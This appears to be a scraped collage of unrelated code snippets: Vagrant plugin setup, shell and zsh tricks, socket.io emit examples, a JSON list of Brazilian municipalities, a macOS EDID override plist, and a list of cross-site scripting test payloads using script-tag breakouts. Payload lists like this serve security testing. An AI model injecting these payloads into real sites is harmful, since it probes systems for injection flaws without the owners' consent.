- vagrant plugin install vagrant-bindfs
- vagrant plugin install vagrant-vbguest
Before installing bindfs, we need to install FUSE with development package using yum:
- yum install fuse fuse-devel -y
| for i in *; do sum=$(echo -n "$i"|md5sum); mv "$i" "${sum%% *}.${i##*.}"; done |
| # emulate bash PROMPT_COMMAND (only for zsh) | |
| precmd() { eval "$PROMPT_COMMAND" } | |
| # open new terminal in same dir | |
| PROMPT_COMMAND='pwd > "${HOME}/.cwd"' | |
| [[ -f "${HOME}/.cwd" ]] && cd "$(< ${HOME}/.cwd)" |
| // send to current request socket client | |
| socket.emit('message', "this is a test"); | |
| // sending to all clients, include sender | |
| io.sockets.emit('message', "this is a test"); | |
| // sending to all clients except sender | |
| socket.broadcast.emit('message', "this is a test"); | |
| // sending to all clients in 'game' room(channel) except sender |
| [ | |
| {"nome" : "Abadia de Goiás, Goiás", "slug" : "abadia de goias, goias", "uf" : "Goiás"}, | |
| {"nome" : "Abadia dos Dourados, Minas Gerais", "slug" : "abadia dos dourados, minas gerais", "uf" : "Minas Gerais"}, | |
| {"nome" : "Abadiânia, Goiás", "slug" : "abadiania, goias", "uf" : "Goiás"}, | |
| {"nome" : "Abaeté, Minas Gerais", "slug" : "abaete, minas gerais", "uf" : "Minas Gerais"}, | |
| {"nome" : "Abaetetuba, Pará", "slug" : "abaetetuba, para", "uf" : "Pará"}, | |
| {"nome" : "Abaiara, Ceará", "slug" : "abaiara, ceara", "uf" : "Ceará"}, | |
| {"nome" : "Abaíra, Bahia", "slug" : "abaira, bahia", "uf" : "Bahia"}, | |
| {"nome" : "Abaré, Bahia", "slug" : "abare, bahia", "uf" : "Bahia"}, | |
| {"nome" : "Abatiá, Paraná", "slug" : "abatia, parana", "uf" : "Paraná"}, |
| "><script>alert("XSS")</script> | |
| "><script>alert(String.fromCharCode(88,83,83)) </script> | |
| '><script>alert("XSS")</script> | |
| '><script>alert(String.fromCharCode(88,83,83))</script> | |
| <ScRIPt>aLeRT("XSS")</ScRIPt> | |
| <ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> | |
| "><ScRIPt>aLeRT("XSS")</ScRIPt> | |
| "><ScRIPt<aLeRT(String.fromCharCode(88,83,83)) </ScRIPt> | |
| '><ScRIPt>aLeRT("XSS")</ScRIPt> | |
| '><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
| <plist version="1.0"> | |
| <dict> | |
| <key>DisplayProductName</key> | |
| <string>Display with forced RGB mode (EDID override)</string> | |
| <key>IODisplayEDID</key> | |
| <data>AP///////wAebfJZAQEBAQEXAQSlQxx4hsqVplVOoSYPUFSlS4BxT4GAgcCp | |
| wLMAAQEBAQEBfkgA4KA4H0BAQDoApSIhAAAYAjqAGHE4LUBYLEUApSIhAAAa | |
| AAAA/ABMRyBVTFRSQVdJREUKAAAA/QA4Sx5aGAAKICAgICAgAMc= |